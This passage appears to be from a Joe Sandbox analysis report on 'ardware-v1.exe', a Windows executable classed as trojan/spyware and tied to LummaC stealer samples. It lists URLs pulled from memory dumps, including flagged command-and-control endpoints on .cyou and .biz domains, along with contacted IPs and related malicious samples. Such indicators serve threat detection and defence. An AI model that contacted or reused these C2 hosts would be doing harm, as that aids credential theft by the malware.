                                                                                                                https://steam.tv/ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://ocsp.sectigo.com00ardware-v1.exefalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://wrathful-jammy.cyou/piardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://lev-tolstoi.com/ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.0000000001054000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632755180.0000000001085000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://store.steampowered.com/privacy_agreement/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://wrathful-jammy.cyou/ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://store.steampowered.com/points/shop/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://lev-tolstoi.com/pxTardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://ocsp.rootca1.amazontrust.com0:ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.ardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://sketchfab.comardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.ecosia.org/newtab/ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://lv.queniujq.cnardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://steamcommunity.com/profiles/76561199724331900/inventory/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brardware-v1.exe, 00000000.00000003.2486573768.0000000003975000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://www.youtube.com/ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://store.steampowered.com/privacy_agreement/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://community.fastly.steamstatic.ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://lev-tolstoi.com:443/apilardware-v1.exe, 00000000.00000002.2632519003.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://awake-weaves.cyou/api8ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                      		unknown
                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.google.com/recaptcha/ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://checkout.steampowered.com/ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://awake-weaves.cyou/apiLardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            		unknown
                                                                                                                                                            https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://spend-shiny.cyou:443/apiardware-v1.exe, 00000000.00000003.2331449931.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              		unknown
                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://store.steampowered.com/;ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://store.steampowered.com/about/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://steamcommunity.com/my/wishlist/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://ocsp.sectigo.com0ardware-v1.exefalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://lev-tolstoi.com/900ardware-v1.exe, 00000000.00000002.2632519003.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://lev-tolstoi.com/erardware-v1.exe, 00000000.00000003.2543085996.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542350182.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543259774.00000000010D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://help.steampowered.com/en/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://steamcommunity.com/market/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://store.steampowered.com/news/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://deafeninggeh.biz:443/api1ardware-v1.exe, 00000000.00000003.2331449931.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Qardware-v1.exefalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://lev-tolstoi.com/apimardware-v1.exe, 00000000.00000003.2542434664.0000000001052000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#ardware-v1.exefalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYiardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high

                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                            Public IPs

                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                            104.21.66.86
                                                                                                                                                                                            		lev-tolstoi.comUnited States
                                                                                                                                                                                            		13335CLOUDFLARENETUStrue
                                                                                                                                                                                            45.77.249.79
                                                                                                                                                                                            		deafeninggeh.bizUnited States
                                                                                                                                                                                            		20473AS-CHOOPAUSfalse
                                                                                                                                                                                            23.55.153.106
                                                                                                                                                                                            		steamcommunity.comUnited States
                                                                                                                                                                                            		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                            178.62.201.34
                                                                                                                                                                                            		immureprech.bizEuropean Union
                                                                                                                                                                                            		14061DIGITALOCEAN-ASNUSfalse

                                                                                                                                                                                            General Information

                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                            Analysis ID:1577233
                                                                                                                                                                                            Start date and time:2024-12-18 09:56:14 +01:00
                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                            Overall analysis duration:0h 7m 3s
                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                            Report type:full
                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                            Run name:Run with higher sleep bypass
                                                                                                                                                                                            Number of analysed new started processes analysed:6
                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                            Technologies:
                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                            Sample name:ardware-v1.exe
                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@1/0@13/4
                                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                                                            • Number of non-executed functions: 2
                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                                                                                            Warnings

                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 172.202.163.200
                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                            • Execution Graph export aborted for target ardware-v1.exe, PID 7748 because there are no executed function
                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                            Simulations

                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                            No simulations

                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                            IPs

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                            • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                            45.77.249.79UoktqWamLR.exeGet hashmaliciousAZORultBrowse
                                                                                                                                                                                            • ehzwq.shop/erd/mac/index.php
                                                                                                                                                                                            RgZaLjgCto.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                            • uyhgqunqkxnx.pw/EiDQjNbWEQ/
                                                                                                                                                                                            java.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                            • uyhgqunqkxnx.pw/EiDQjNbWEQ/
                                                                                                                                                                                            23.55.153.106sNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                      wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          I37faEaz1K.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            YbJEkgZ4z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              178.62.201.34java.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                                              • uyhgqunqkxnx.pw/EiDQjNbWEQ/

                                                                                                                                                                                                              Domains

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              deafeninggeh.bizsNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.131.68.180
                                                                                                                                                                                                              66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.131.68.180
                                                                                                                                                                                                              DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.131.68.180
                                                                                                                                                                                                              SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.131.68.180
                                                                                                                                                                                                              N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 104.131.68.180
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              immureprech.bizsNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.131.68.180
                                                                                                                                                                                                              66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.131.68.180
                                                                                                                                                                                                              he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                              • 104.131.68.180
                                                                                                                                                                                                              steamcommunity.comsNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, XmrigBrowse
                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                              hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.121.10.34
                                                                                                                                                                                                              DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.121.10.34
                                                                                                                                                                                                              he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.121.10.34
                                                                                                                                                                                                              SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.121.10.34
                                                                                                                                                                                                              N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.121.10.34
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 104.121.10.34

                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              AS-CHOOPAUS66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                              • 45.63.94.214
                                                                                                                                                                                                              hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 45.77.249.79
